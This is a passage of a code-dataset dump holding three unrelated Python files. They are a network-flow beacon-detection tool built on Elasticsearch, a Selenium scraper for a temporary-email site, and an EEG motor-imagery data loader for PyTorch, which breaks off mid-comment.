import json_normalize\nfrom elasticsearch import Elasticsearch, helpers\nfrom tqdm import tqdm, tqdm_notebook\n\nfrom iputils import private_check, multicast_check, reserved_check\nfrom tld import TLD\nfrom whois import WhoisLookup\nfrom threat import TI\n# from es_domain import GetDomain\n\n\ndef readJson(files):\n with open(files, encoding='utf-8') as f:\n data = json.load(f)\n return data\n\n\nclass HawkEye():\n def __init__(self):\n '''\n 初始化配置文件设置\n '''\n\n # 脚本参数初始化\n self.parser = argparse.ArgumentParser(description='基于Flow的周期检测工具. by Homer.')\n self.parser.add_argument('-c', dest='config', type=str, help='Config Files. Default: config.json')\n self.parser.add_argument('-f', dest='file', type=str, help='Load local raw_data')\n self.parser.add_argument('-o', dest='output', type=str, help='Output Files')\n self.parser.add_argument('--ti', help='Threat Intelligence', action='store_true')\n self.parser.add_argument('--tld', help='Host to TLD', action='store_true')\n self.parser.add_argument('--dns', help='IP TO Domain', action='store_true')\n self.parser.add_argument('--whois', help='WhoisLookup', action='store_true')\n self.parser.add_argument('--json', help='Save CSV Files', action='store_true')\n self.parser.add_argument('--csv', help='Save Json Files', action='store_true')\n self.parser.add_argument('--debug', help='Enable debug mode', action='store_true')\n self.args = self.parser.parse_args()\n \n if not self.args.config:\n print('Specify configuration file.')\n os._exit(0)\n\n if not self.args.output:\n print('Specify Save Path.')\n os._exit(0)\n\n self.config = readJson(self.args.config)\n\n # 产品类型初始化\n self.product = self.config['product'].lower()\n \n # 实例化ES\n host = self.config['host']\n timeout = self.config['timeout']\n self.es = Elasticsearch(host, timeout=timeout)\n \n # ES字段初始化\n self.index = self.config['index']\n self.timestamp = self.config['field']['timestamp']\n self.src_ip = self.config['field']['src_ip']\n self.proto = self.config['field']['proto']\n self.dst_ip = self.config['field']['dst_ip']\n self.dst_port = self.config['field']['dst_port']\n self.flow_id = self.config['field']['flow_id']\n self.flow_age = self.config['field']['flow_age']\n self.flow_bytes_toserver = self.config['field']['flow_bytes_toserver']\n\n # 扩展字段 2018_05_22\n self.columns = self.config['columns']['basis_columns']\n self.ext_columns = self.config['columns']['ext_columns']\n \n if self.proto:\n self.columns.insert(1, self.ext_columns[0])\n if self.flow_bytes_toserver:\n self.columns.append(self.ext_columns[1])\n if self.product == 'nta' or self.product == 'nta':\n self.columns.extend(self.ext_columns[2:])\n\n # ES语句初始化\n event_type = self.config['event_type']\n period = self.config['period']\n self.gte, self.lte = self.getTimestamp(period)\n self.body = self.hour_query_body(event_type)\n\n # 周期性检测配置\n self.min_occur = self.config['min_occur']\n self.min_interval = self.config['min_interval']\n self.min_percent = self.config['min_percent']\n self.window = self.config['window']\n self.threads = self.config['threads']\n \n # 多进程配置\n self.q_job = JoinableQueue()\n self.lock_df = Lock()\n self.lock_list = Lock()\n\n \n def getTimestamp(self, _hour):\n '''\n 获取时间戳方法\n '''\n now = int(time.time() * 1000)\n seconds = 1000\n minutes = 60 * seconds\n hours = 60 * minutes\n lte = now\n gte = int(now - _hour * hours)\n \n return gte, lte\n \n \n def hour_query_body(self, _event_type):\n '''\n 查询语句\n '''\n exclude_field = self.config.get('must_not', [])\n\n # 新增测试代码 2018_05_22\n\n timestamp_field = 
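# The body assembled below is a plain Elasticsearch bool query: a term filter
# on the event type plus an epoch_millis range over [gte, lte], with any
# optional 'must' / 'must_not' clauses merged in from config.json.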
self.timestamp\n event_field = 'event_type'\n raw_field = list(self.config['field'].values())\n\n if self.product == 'ep' or self.product == 'nta':\n event_field = 'event_name'\n timestamp_field = 'occur_time'\n \n if self.product == 'nta':\n raw_field = ['original_log']\n\n include_field = self.config.get('must', [])\n \n \n body = {\n '_source': raw_field,\n 'query': {\n 'bool': {\n 'filter': [\n {\n 'term': {\n event_field: _event_type\n }\n },\n {\n 'range': {\n timestamp_field: {\n 'gte': self.gte,\n 'lte': self.lte,\n 'format': 'epoch_millis'\n }\n }\n }\n ],\n 'must_not': exclude_field,\n 'must': include_field # 新增代码 2018_05_22\n }\n }\n }\n \n return body\n\n \n def search(self):\n '''\n 滚动查询方法\n '''\n es_results = helpers.scan(\n client = self.es,\n index = self.index,\n query = self.body,\n size = 10000,\n scroll = '90m',\n timeout = '10m'\n )\n json_results = [ item['_source'] for item in tqdm(es_results)]\n df_results = json_normalize(json_results)\n\n return df_results\n\n \n def tetrad(self, _df):\n\n if self.proto:\n # tetrad: src_ip、proto、dst_ip、dst_port\n _df['tetrad_id'] = (_df[self.src_ip] + _df[self.proto] + _df[self.dst_ip] + _df[self.dst_port].astype(str)).apply(hash)\n else:\n # tetrad: src_ip、dst_ip、dst_port\n _df['tetrad_id'] = (_df[self.src_ip] + _df[self.dst_ip] + _df[self.dst_port].astype(str)).apply(hash)\n\n _df['tetrad_freq'] = _df.groupby('tetrad_id')['tetrad_id'].transform('count').fillna(0).astype(int)\n \n return _df\n\n \n def percent_grouping(self, _dict, _total):\n '''\n 百分比计算\n '''\n mx = 0\n interval = 0\n # Finding the key with the largest value (interval with most events)\n mx_key = int(max(iter(list(_dict.keys())), key=(lambda key: _dict[key])))\n\n mx_percent = 0.0\n\n for i in range(mx_key - self.window, mx_key + 1):\n current = 0\n # Finding center of current window\n curr_interval = i + int(self.window / 2)\n for j in range(i, i + self.window):\n if j in _dict:\n current += _dict[j]\n percent = float(current) / _total * 100\n\n if percent > mx_percent:\n mx_percent = percent\n interval = curr_interval\n\n return interval, mx_percent\n \n \n def find_beacon(self, _raw_data, _beacon_list):\n '''\n 查询周期方法\n '''\n\n if self.product == 'nta' or self.product == 'ep':\n milliseconds = 1000\n else:\n milliseconds = 1000000000\n\n while not self.q_job.empty():\n tetrad_id = self.q_job.get()\n self.lock_df.acquire()\n work = _raw_data[_raw_data.tetrad_id == tetrad_id].reset_index(drop=True)\n self.lock_df.release()\n \n work[self.timestamp] = pd.to_datetime(work[self.timestamp])\n work[self.timestamp] = (work[self.timestamp].astype(int) / milliseconds).astype(int)\n work = work.sort_values([self.timestamp])\n work['delta'] = (work[self.timestamp] - work[self.timestamp].shift()).fillna(0)\n work = work[1:]\n\n d = dict(work.delta.value_counts())\n for key in list(d.keys()):\n if key < self.min_interval:\n del d[key]\n \n # Finding the total number of events\n total = sum(d.values())\n \n if d and total > self.min_occur:\n _window, _percent = self.percent_grouping(d, total)\n if _percent > self.min_percent and total > self.min_occur:\n percent = int(_percent)\n window = _window\n src_ip = work[self.src_ip].unique()[0] \n dst_ip = work[self.dst_ip].unique()[0]\n dst_port = work[self.dst_port].unique()[0]\n src_degree = len(work[self.dst_ip].unique())\n occur = total\n\n col = [src_ip, dst_ip, dst_port, src_degree, occur, percent, window]\n\n if self.proto:\n proto = work[self.proto].unique()[0]\n col.insert(1, proto)\n\n if self.flow_bytes_toserver:\n 
flow_bytes_sum = work[self.flow_bytes_toserver].sum()\n col.append(flow_bytes_sum)\n\n if self.product == 'nta' or self.product == 'suricata':\n groups = {\n self.flow_bytes_toserver: ['min', 'max', 'mean', 'std'],\n self.flow_age: ['min', 'max', 'mean', 'std']\n }\n\n columns = {\n 'flow_bytes': {\n 'min': 'flow_bytes_min',\n 'max': 'flow_bytes_max',\n 'mean': 'flow_bytes_mean',\n 'std': 'flow_bytes_std'\n },\n 'flow_age': {\n 'min': 'flow_age_min',\n 'max': 'flow_age_max',\n 'mean': 'flow_age_mean',\n 'std': 'flow_age_std'\n }\n }\n\n work_group = work.groupby('tetrad_id').aggregate(groups)\n work_flow_bytes = work_group[self.flow_bytes_toserver].rename(columns=columns['flow_bytes'])\n work_flow_age = work_group[self.flow_age].rename(columns=columns['flow_age'])\n \n flow_bytes_val = work_flow_bytes.values.tolist()[0]\n flow_age_val = work_flow_age.values.tolist()[0]\n\n col.extend(flow_bytes_val)\n col.extend(flow_age_val)\n\n self.lock_list.acquire()\n _beacon_list.append(col)\n self.lock_list.release()\n \n self.q_job.task_done()\n\n \n def find_beacons(self, _raw_data):\n '''\n 多线程分析\n '''\n\n high_freq = list(_raw_data[_raw_data.tetrad_freq > self.min_occur].groupby('tetrad_id').groups.keys())\n\n for _tetrad_id in high_freq:\n self.q_job.put(_tetrad_id)\n\n mgr = Manager()\n beacon_list = mgr.list()\n processes = [ Process(target=self.find_beacon, args=(_raw_data, beacon_list,)) for thread in range(self.threads) ]\n\n # Run processes\n for p in processes:\n p.start()\n\n # Exit the completed processes\n for p in processes:\n p.join()\n\n beacon_list = list(beacon_list)\n beacon_df = pd.DataFrame(beacon_list, columns=self.columns).dropna()\n beacon_df.interval = beacon_df.interval.astype(int)\n\n beacon_df['dst_degree'] = beacon_df.groupby('dst_ip')['dst_ip'].transform('count').fillna(0).astype(int)\n\n private_check_src_obj = beacon_df['src_ip'].apply(private_check)\n private_check_dst_obj = beacon_df['dst_ip'].apply(private_check)\n multicast_check_dst_obj = beacon_df['dst_ip'].apply(multicast_check)\n reserved_check_dst_obj = beacon_df['dst_ip'].apply(reserved_check)\n beacon_df = beacon_df[(private_check_src_obj) & (~multicast_check_dst_obj) & (~reserved_check_dst_obj) & (~private_check_dst_obj)]\n\n return beacon_df\n\n\n def ntaFlow_normalization(self, _original_log):\n '''\n NTA数据标准化\n '''\n original_log_raw = _original_log['original_log'].str.strip()\n original_log_raw = original_log_raw.apply(lambda original_log: json.loads(original_log))\n \n original_log = pd.DataFrame(original_log_raw.tolist())\n\n if self.flow_bytes_toserver:\n original_log['bytes_toserver'] = original_log['flow'].apply(lambda x: x.get('bytes_toserver'))\n \n if self.flow_age:\n original_log['age'] = original_log['flow'].apply(lambda x: x.get('age'))\n \n col = ['@end_timestamp', 'app_proto', 'app_proto_tc', 'app_proto_ts', 'flow', 'ndpi_app_proto', 'protocol', 'tcp', 'src_port', \\\n 'app_proto_expected', 'app_proto_orig', 'icmp_code', 'icmp_type']\n\n for i in col:\n if i in original_log.columns:\n original_log.drop(i, axis=1, inplace=True)\n \n return original_log\n\n\n def dns_query_body(self, _dst_ip, _rdata):\n '''\n DNS响应事件 请求体\n '''\n body = {\n \"query\": {\n \"bool\": {\n \"filter\": [\n {\n \"term\": {\n \"event_digest\": \"nta_dns\"\n }\n },\n {\n \"term\": {\n \"event_name\": \"DNS响应\"\n }\n },\n {\n \"term\": {\n \"dst_address\": _dst_ip # 对应 analyze_data: src_ip\n }\n },\n {\n \"term\": {\n \"dns_answer\": _rdata # 对应 analyze_data: dst_ip\n }\n },\n {\n 'range': {\n 'occur_time': {\n 
'gte': self.gte,\n 'lte': self.lte,\n 'format': 'epoch_millis'\n }\n }\n }\n ]\n }\n },\n \"aggs\": {\n \"rrname\": {\n \"terms\": {\n \"field\": \"domain_name\"\n }\n }\n },\n \"size\": 0\n }\n\n return body\n\n\n def dns_search(self, _df):\n '''\n 1. DNS响应数据查询\n 2. 格式化输出\n '''\n dst_ip = _df['src_ip']\n dns_rdata = _df['dst_ip']\n body = self.dns_query_body(dst_ip, dns_rdata)\n dns_json = self.es.search(index=self.index, body=body)\n dns_data = dns_json['aggregations']['rrname']['buckets']\n if dns_data:\n dns_data = json_normalize(dns_data).key.tolist()\n\n _df['domain'] = dns_data\n\n return _df\n\n \n def filter_dns(self, _df):\n '''\n DNS响应查询\n '''\n if self.proto:\n filter_port_obj = _df[self.dst_port] == 53\n filter_proto_obj = _df[self.proto] == 'UDP'\n df = _df[(~filter_proto_obj) & (~filter_port_obj)]\n else:\n filter_port_obj = _df[self.dst_port] == 53\n df = _df[~filter_port_obj]\n\n return df\n\n\n def save_file(self, _df, _file):\n if self.args.json:\n suffix = '.json'\n _df.to_json(self.args.output + _file + suffix, orient='index')\n elif self.args.csv:\n suffix = '.csv'\n _df.to_csv(self.args.output + _file + suffix, index=False)\n print('Data saved Successfully.')\n\n\n def load_file(self, _file):\n reader = pd.read_csv(_file, chunksize=100000000)\n chunks = []\n for chunk in reader:\n chunks.append(chunk)\n df = pd.concat(chunks)\n print('Data loading Successful.')\n\n return df\n\n\n def main(self):\n\n if not self.args.file:\n print('Searching Netflow.')\n res = self.search()\n # if self.args.debug:\n # res.to_csv(self.args.output + 'raw_data_search.csv', index=False)\n\n # 标准化 NTA 数据\n if self.product == 'nta':\n res = self.ntaFlow_normalization(res)\n\n print('Create Tetrad.')\n res = self.tetrad(res)\n if self.args.debug:\n res.to_csv(self.args.output + 'raw_data.csv', index=False)\n else:\n print('Data loading.')\n res = self.load_file(self.args.file)\n \n # 分析数据\n print('Data analysis.')\n res = self.find_beacons(res)\n if self.args.debug:\n self.save_file(res, 'analyze_data_fin')\n print('Data analysis completed.')\n\n if self.args.dns:\n if not res.empty:\n # Local WhoisLookup\n res = self.filter_dns(res)\n tqdm.pandas(desc=\"Local WhoisLookup\")\n res = res.progress_apply(lambda x: self.dns_search(x), axis=1)\n if self.args.debug:\n self.save_file(res, 'local_whois_fin')\n print('Local WhoisLookup completed.')\n\n if self.args.tld:\n # Domain to TLD\n tools_tld = TLD()\n res = tools_tld.main(res)\n if self.args.debug:\n self.save_file(res, 'local_tld_fin')\n print('Domain to TLD completed.')\n else:\n print('The result is empty, Local WhoisLookup not Working.')\n\n if self.args.whois:\n if not res.empty:\n # Online WhoisLookup\n tools_whois = WhoisLookup()\n res = tools_whois.main(res)\n if self.args.debug:\n self.save_file(res, 'online_whois_fin')\n print('Online WhoisLookup completed.')\n else:\n print('The result is empty, Online WhoisLookup not Working.')\n\n if self.args.ti:\n # Threat Intelligence\n tools_ti = TI()\n if not res.empty:\n res = tools_ti.main(res)\n if self.args.debug:\n self.save_file(res, 'ti_fin')\n print('Check Threat Intelligence completed.')\n else:\n print('The result is empty, Threat Intelligence not working.')\n \n \n res.sort_values('percent', ascending=False, inplace=True)\n res.reset_index(drop=True, inplace=True)\n\n self.save_file(res, 'analysis_result')\n \n print('Analysis completed, program exit.')\n\n os._exit(0)\n\n\nif __name__ == '__main__':\n hawkEye = HawkEye()\n 
hawkEye.main()","sub_path":"periodic.py","file_name":"periodic.py","file_ext":"py","file_size_in_byte":19912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"521783407","text":"from selenium import webdriver\r\n\r\n\r\n__author__ = \"Gaizka - @ethg1 on GitHub\"\r\n\r\n\r\n\"\"\"\r\nMIT License\r\n\r\nA short and simple permissive license with conditions only requiring preservation of\r\ncopyright and license notices. Licensed works, modifications, and larger works may\r\nbe distributed under different terms and without source code.\r\n\r\nhttps://github.com/ethg1/temp-mail-org-api-ws/blob/master/LICENSE\r\n\r\n\"\"\"\r\n\r\n\r\nclass TempMailAPI_Email:\r\n def __init__(self, from_name, from_email, recv_time, subject, source_html):\r\n self.from_name = from_name\r\n self.from_email = from_email\r\n self.recv_time = recv_time\r\n self.subject = subject\r\n self.source_html = source_html\r\n\r\n\r\nclass TempMailAPI_WebScrap:\r\n def __init__(self):\r\n self.driver = None\r\n\r\n def load(self, firefox_binary_location, geckodriver_location = \"./geckodriver.exe\"):\r\n options = webdriver.FirefoxOptions()\r\n options.headless = True\r\n options.binary = firefox_binary_location\r\n self.driver = webdriver.Firefox(options=options, executable_path=geckodriver_location)\r\n\r\n def get_new_mail_address(self):\r\n self.driver.get('https://temp-mail.org/')\r\n btn = self.driver.find_element_by_id('click-to-delete')\r\n btn.click()\r\n return self.get_current_mail_address()\r\n\r\n def get_current_mail_address(self):\r\n self.driver.get('https://temp-mail.org/')\r\n\r\n mail = self.driver.find_element_by_id('mail')\r\n\r\n return mail.get_attribute('value')\r\n\r\n def get_mail_list(self):\r\n self.driver.get('https://temp-mail.org/')\r\n\r\n dataList = self.driver.find_element_by_class_name('inbox-dataList')\r\n li = dataList.find_elements_by_tag_name('li')[1:]\r\n\r\n mails = []\r\n for m in li:\r\n a = m.find_element_by_tag_name('a')\r\n a.click()\r\n\r\n data = self.driver.find_element_by_class_name('inbox-data-content')\r\n\r\n mail = TempMailAPI_Email(\r\n data.find_element_by_class_name('from-name').text,\r\n data.find_element_by_class_name('from-email').text,\r\n data.find_element_by_class_name('user-data-time-data').text,\r\n data.find_element_by_class_name('user-data-subject').find_element_by_tag_name('h4').text,\r\n data.find_element_by_class_name('inbox-data-content-intro').get_attribute('innerHTML')\r\n )\r\n\r\n mails.append(mail)\r\n self.driver.get('https://temp-mail.org/')\r\n\r\n return mails\r\n\r\n def close(self):\r\n try:\r\n self.driver.close()\r\n self.driver.quit()\r\n except:\r\n pass\r\n","sub_path":"tempmail.py","file_name":"tempmail.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"619682241","text":"import numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom torch.utils.data import DataLoader\nfrom datasets import ChannelsVoltageDataset\nfrom mne.datasets import eegbci\nfrom mne.io import concatenate_raws, read_raw_edf\nfrom mne import Epochs, find_events, concatenate_epochs\nimport os\nfrom visualisations import eeg_sample_plot, events_distribution_plot\nimport torch\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\n\n\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n\"\"\"\nThe data are provided here in EDF+ format (containing 64 EEG signals, each 
sampled at 160 samples per second, and an \nannotation channel).\nThe .event files and the annotation channels in the corresponding .edf files contain identical data.\n\nEach annotation includes one of three codes (T0, T1, or T2):\n\nCoded as label = 1:\n T0 corresponds to rest\n\nCoded as label = 2:\n T1 corresponds to onset of motion (real or imagined of\n the left fist (in runs 3, 4, 7, 8, 11, and 12)\n both fists (in runs 5, 6, 9, 10, 13, and 14)\n\nCoded as label = 3: \n T2 corresponds to onset of motion (real or imagined) of\n the right fist (in runs 3, 4, 7, 8, 11, and 12)\n both feet (in runs 5, 6, 9, 10, 13, and 14)\n\nThe runs correspond to:\nrun \t task\n1 \t Baseline, eyes open\n2 \t Baseline, eyes closed\n3, 7, 11 \t Motor execution: left vs right hand\n4, 8, 12 \t Motor imagery: left vs right hand\n5, 9, 13 \t Motor execution: hands vs feet\n6, 10, 14 \t Motor imagery: hands vs feet\n\nPOSSIBLE LABELS APPEAR IN RUNS ACTUAL LABEL IN RUNS OUR OFFSET NEEDED\n0 Baseline, eyes open 1 T0(=1) 1\n1 Baseline, eyes closed 2 T0(=1) 0\n2 Motor Ex: Left Hand 3,7,11 T1(=2) 0\n3 Motor Ex: Right Hand 3,7,11 T2(=3) 0\n4 Motor Im: Left Hand 4,8,12 T1(=2) -2\n5 Motor Im: Right Hand 4,8,12 T2(=3) -2\n6 Motor Ex: Both Hands 5,9,13 T1(=2) -4\n7 Motor Ex: Both Feet 5,9,13 T2(=3) -4\n8 Motor Im: Both Hands 6,10,14 T1(=2) -6\n9 Motor Im: Both Feet 6,10,14 T2(=3) -6\n\n\"\"\"\n\n\ndef get_dataloader_objects(my_cfg):\n \"\"\"LOAD RAW DATA\"\"\"\n epoched = get_epoched_data(my_cfg)\n\n \"\"\"DATA PREPARATION\"\"\"\n # Convert data from volt to millivolt\n # Pytorch expects float32 for input and int64 for labels.\n event_current_class_column = 2 # event_previous_class_column = 1 event_start_sample_column = 0\n\n data = (epoched.get_data() * 1e6) # Get all epochs as a 3D array.\n data = data[:, :-1, :] # We do not want to feed in the labels as inputs\n \n if my_cfg.removeLastData:\n remaining = data.shape[2] % 10\n data = data[:, :, :-remaining]\n \n if my_cfg.Elec2D:\n data = dataset_1Dto2D(data)\n \n # Normalize data\n if my_cfg.normalize:\n data = normalize(data)\n \n # -offset_to_subtract -> Classes made matching to CX definition\n labels = epoched.events[:, event_current_class_column]\n\n tSample = data.shape[-1]\n \n if my_cfg.wCropped:\n data, labels = WindowCrop(data,labels,my_cfg.wSize)\n tSample = data.shape[-1]\n \n if len(data.shape) == 4:\n input_dimension_ = data.shape[1] * data.shape[2] * data.shape[3]\n else:\n input_dimension_ = data.shape[1] * data.shape[2]\n output_dimension_ = my_cfg.nClasses \n \n \n print(str(tSample),\" time samples and \",str(data.shape[1]),\" EEG channels for one epoch are taken. \",\\\n \"Total epoch number is \",str(data.shape[0]),\" and there are \",str(len(my_cfg.selected_subjects)),\" subjects included.\\n\",\\\n \"There are in total \", str(my_cfg.nClasses),\" classes for classification.\\n\",flush=True)\n \n # Split data in train test and validation set. 
Stratify makes sure the label distribution is the same\n temp_data, test_data, temp_labels, test_labels = train_test_split(data, labels, test_size=my_cfg.test_split,\n shuffle=True, stratify=labels)\n\n train_data, val_data, train_labels, val_labels = train_test_split(temp_data, temp_labels,\n test_size=my_cfg.validation_split, shuffle=True,\n stratify=temp_labels)\n \n \n # Do data augmentation of training data\n if my_cfg.augment_with_gauss_noise:\n train_data, train_labels = augment_with_gaussian_noise(train_data, train_labels, my_cfg.augment_std_gauss,\n my_cfg.augmentation_factor)\n # Drop tiles randomly\n if my_cfg.dropOut:\n train_data = dropout_tiles(train_data,my_cfg) \n \n # Convert them to Tensors already. torch.float is needed for GPU.\n train_data = torch.tensor(train_data, dtype=torch.float)\n train_labels = torch.tensor(train_labels, dtype=torch.long)\n val_data = torch.tensor(val_data, dtype=torch.float)\n val_labels = torch.tensor(val_labels, dtype=torch.long)\n test_data = torch.tensor(test_data, dtype=torch.float)\n test_labels = torch.tensor(test_labels, dtype=torch.long)\n\n myTransforms = None # TODO: This has to be more sophisticated. Should also be list selectable like the optimizers\n\n\n # Define datasets\n train_ds = ChannelsVoltageDataset(train_data, train_labels,\n my_cfg.normalize) # TODO: Should also be list selectable like the optimizers\n val_ds = ChannelsVoltageDataset(val_data, val_labels, my_cfg.normalize)\n test_ds = ChannelsVoltageDataset(test_data, test_labels, my_cfg.normalize)\n\n # Define data loader\n train_dl = DataLoader(train_ds, my_cfg.batch_size, shuffle=True)\n val_dl = DataLoader(val_ds, my_cfg.batch_size, shuffle=False)\n test_dl = DataLoader(test_ds, my_cfg.batch_size, shuffle=False)\n \n\n return train_dl, val_dl, test_dl, input_dimension_, output_dimension_\n\n\ndef normalize(data):\n print(\"Normalizing data...\",flush=True)\n \n #mean = np.mean(data,axis=(1,2)).reshape(-1,1,1)\n #std = np.std(data,axis=(1,2)).reshape(-1,1,1)\n #data = np.divide( data - np.tile(mean,(data.shape[1],data.shape[2])) , np.tile(std,(data.shape[1],data.shape[2])) )\n \n for i in range(data.shape[0]):\n data[i,:,:] = ( data[i,:,:] - np.mean(data[i,:,:]) ) / np.std( data[i,:,:] )\n data[i,:,:] = (data[i,:,:]+1)*0.5\n \n print(\"...data was normalized.\\n\",flush=True)\n return data\n \ndef dropout_tiles(data,config):\n \n perc = config.dropOutTilePerc\n \n sTimeTile = config.dropOutTimeTile\n sChannelTile = config.dropOutChannelTile\n \n nEpochs = data.shape[0]\n nChannel = data.shape[1]\n nTime = data.shape[2]\n \n if config.dropOutChOnly == True:\n sTimeTile = nTime\n \n if config.dropOutTimeOnly == True:\n sChannelTile = nChannel\n \n nTimeTile = int(np.ceil(nTime/sTimeTile))\n nChannelTile = int(np.ceil(nChannel/sChannelTile))\n \n print(\"Data is being dropped with \", str(perc), \"prob and \", str(sTimeTile), \" sized time tiles(\",\\\n str(nTimeTile),\") and \", str(sChannelTile),\" sized channel tiles(\",str(nChannelTile),\").\", flush=True)\n \n drop = np.random.choice([0, 1], (nEpochs,nChannelTile,nTimeTile), p=[perc,(1-perc)])\n \n drop_mean = np.mean(np.mean(drop,axis=2),axis=1)\n zero_index = np.where(drop_mean == 0)\n\n for idx in zero_index[0]:\n if nTimeTile*nChannelTile > 1:\n fill_i = np.random.randint(0, nTimeTile*nChannelTile-1)\n else:\n fill_i = int(0)\n fill_ch = int(fill_i / nTimeTile)\n fill_time = int(fill_i % nTimeTile)\n drop[idx,fill_ch,fill_time] = 1\n \n drop = np.repeat(drop, sTimeTile, axis=2)\n drop = np.repeat(drop, 
sChannelTile, axis=1)\n \n drop = drop[:,:data.shape[1],:data.shape[2]]\n data = np.multiply(data,drop)\n \n print(\"...data was being dropped.\", flush=True)\n return data\n \n\ndef augment_with_gaussian_noise(data, labels, std, multiplier):\n \n print(\"Data is being augmented with gaussian noise...\",flush=True)\n mean = 0\n augmented_data = []\n augmented_labels = []\n if std > 1:\n raise ValueError(' We expect in the range 0 to 1')\n\n for idx, tmp_data in tqdm(enumerate(data),total=len(data)):\n if idx % 100 == 0:\n pass\n #print('Augmented ', idx, 'of', len(data))\n for j in range(multiplier):\n tmp_label = labels[idx]\n if j == 0: # Take the real data for once\n augmented_data.append(tmp_data)\n augmented_labels.append(tmp_label)\n else:\n tmp_std_data = np.std(tmp_data)\n tmp_std = tmp_std_data*std\n\n noise = np.random.normal(loc=mean, scale=tmp_std, size=np.shape(tmp_data))\n tmp_data_noisy = np.add(tmp_data, noise)\n augmented_data.append(tmp_data_noisy)\n augmented_labels.append(tmp_label)\n augmented_data = np.asarray(augmented_data, dtype=np.float64)\n augmented_labels = np.asarray(augmented_labels, dtype=np.int32)\n print(\"...augmentation with gaussian noise is finished. \\n\",flush=True)\n\n return augmented_data, augmented_labels\n\ndef get_epoched_data(my_cfg):\n # Experimental runs per subject (range from 1 to 14). Runs differ in tasks performed tasks!\n # -> We want to split up the dataset in all classes there are\n\n #arr_runs = np.array([1, 2, [3, 7, 11], [4, 8, 12], [5, 9, 13], [6, 10, 14]])\n #arr_selected_classes = np.array([1, 1, [2, 3], [2, 3], [2, 3], [2, 3], [2, 3]])\n #arr_labels_offsets = np.array([1, 0, 0, -2, -4, -6])\n \n #***** 8 CLASSES ( WITHOUT BASELINE ) ***************\n arr_runs = np.array([[3, 7, 11], [4, 8, 12], [5, 9, 13], [6, 10, 14]])\n arr_selected_classes = np.array([[2, 3], [2, 3], [2, 3], [2, 3], [2, 3]])\n arr_labels_offsets = np.array([-2, 0, 2, -4]) \n \n #***** 4 CLASSES ***************\n #arr_runs = np.array([ [4, 8, 12], [6, 10, 14]])\n #arr_runs = np.array([ [3, 7, 11], [5, 9, 13] ])\n #arr_selected_classes = np.array([[2, 3], [2, 3]])\n #arr_labels_offsets = np.array([0, 2]) \n \n #***** 2 CLASSES ***************\n #arr_runs = np.array([ [3, 7, 11]])\n #arr_selected_classes = np.array([[2, 3]])\n #arr_labels_offsets = np.array([2]) \n\n # Load the data\n subjects = my_cfg.selected_subjects\n current_path = os.path.abspath(__file__)\n # print(current_path)\n if 'studi7/home/ProjectCode/' in current_path:\n data_path = '../../var/tmp/RawDataMNE'\n print('We are on the cluster...\\n',flush=True)\n data_path = '../../var/tmp/RawDataMNE'\n else:\n print('We are not on the cluster...\\n',flush=True)\n data_path = 'RawDataMNE'\n\n \n print(\"Data is being loaded using MNE...\",flush=True)\n\n list_epochs = []\n for idx, runs in tqdm(enumerate(arr_runs),total=len(arr_runs)):\n tmp_classes = arr_selected_classes[idx]\n tmp_offset = arr_labels_offsets[idx]\n raw_EDF_list = []\n\n for subj in subjects:\n fileNames = eegbci.load_data(subj, runs, path=data_path)\n raw_EDF = [read_raw_edf(f, preload=True, stim_channel='auto', verbose='WARNING') for f in fileNames]\n raw_EDF_list.append(concatenate_raws(raw_EDF))\n\n raw = concatenate_raws(raw_EDF_list)\n\n # Pick the events\n events = find_events(raw, shortest_event=0, verbose=my_cfg.verbose)\n # Subtract the offset to make the label match\n events[:, 2] = events[:, 2] - tmp_offset\n tmp_classes = (tmp_classes - tmp_offset).tolist()\n # Extract the epochs\n tmp_epoched = Epochs(raw, events, 
event_id=tmp_classes, tmin=my_cfg.time_before_event_s,\n tmax=my_cfg.time_after_event_s, baseline=None, picks=None,\n preload=False, reject=None, flat=None, proj=True, decim=my_cfg.downSample, reject_tmin=None, reject_tmax=None,\n detrend=None, on_missing='error', reject_by_annotation=True, metadata=None,\n verbose=my_cfg.verbose)\n\n # Store epoch for later use\n list_epochs.append(tmp_epoched)\n 'DEBUG'\n \"\"\"SHOW DATA\"\"\"\n # Show some sample EEG data if desired\n if my_cfg.show_eeg_sample_plot:\n eeg_sample_plot(my_cfg.subjectIdx_to_plot, my_cfg.seconds_to_plot, my_cfg.channels_to_plot, raw_EDF_list)\n if my_cfg.show_events_distribution:\n events_distribution_plot(tmp_epoched.events)\n\n epoched = concatenate_epochs(list_epochs)\n\n\n \"\"\"SHOW DATA\"\"\"\n # Show some sample EEG data if desired\n if my_cfg.show_eeg_sample_plot:\n eeg_sample_plot(my_cfg.subjectIdx_to_plot, my_cfg.seconds_to_plot, my_cfg.channels_to_plot, raw_EDF_list)\n if my_cfg.show_events_distribution:\n events_distribution_plot(epoched.events)\n\n print(\"...data loading with MNE was finished. \\n\")\n\n return epoched\n\n\n\n\n'''\n# https://github.com/dalinzhang/Cascade-Parallel/blob/master/data_preprocess/pre_process.py\n\n\tdata_2D[0] = [ \t \t 0, \t 0, \t \t 0, \t 0, data[21], data[22], data[23], \t 0, \t 0, \t 0, \t \t 0]\n\tdata_2D[1] = [\t \t 0, \t 0, \t \t 0, data[24], data[25], data[26], data[27], data[28], \t \t 0, \t 0, \t \t 0]\n\tdata_2D[2] = [\t \t 0, data[29], data[30], data[31], data[32], data[33], data[34], data[35], data[36], data[37], \t \t 0]\n\tdata_2D[3] = [\t \t 0, data[38], data[0], data[1], data[2], data[3], data[4], data[5], data[6], data[39], \t\t 0]\n\tdata_2D[4] = [data[42], data[40], data[7], data[8], data[9], data[10], data[11], data[12], data[13], data[41], data[43]]\n\tdata_2D[5] = [\t \t 0, data[44], data[14], data[15], data[16], data[17], data[18], data[19], data[20], data[45], \t\t 0]\n\tdata_2D[6] = [\t \t 0, data[46], data[47], data[48], data[49], data[50], data[51], data[52], data[53], data[54], \t\t 0]\n\tdata_2D[7] = [\t \t 0, \t 0, \t \t 0, data[55], data[56], data[57], data[58], data[59], \t \t 0, \t 0, \t\t 0]\n\tdata_2D[8] = [\t \t 0, \t 0, \t \t 0, \t 0, data[60], data[61], data[62], \t 0, \t \t 0, \t 0, \t\t 0]\n\tdata_2D[9] = [\t \t 0, \t 0, \t \t 0, 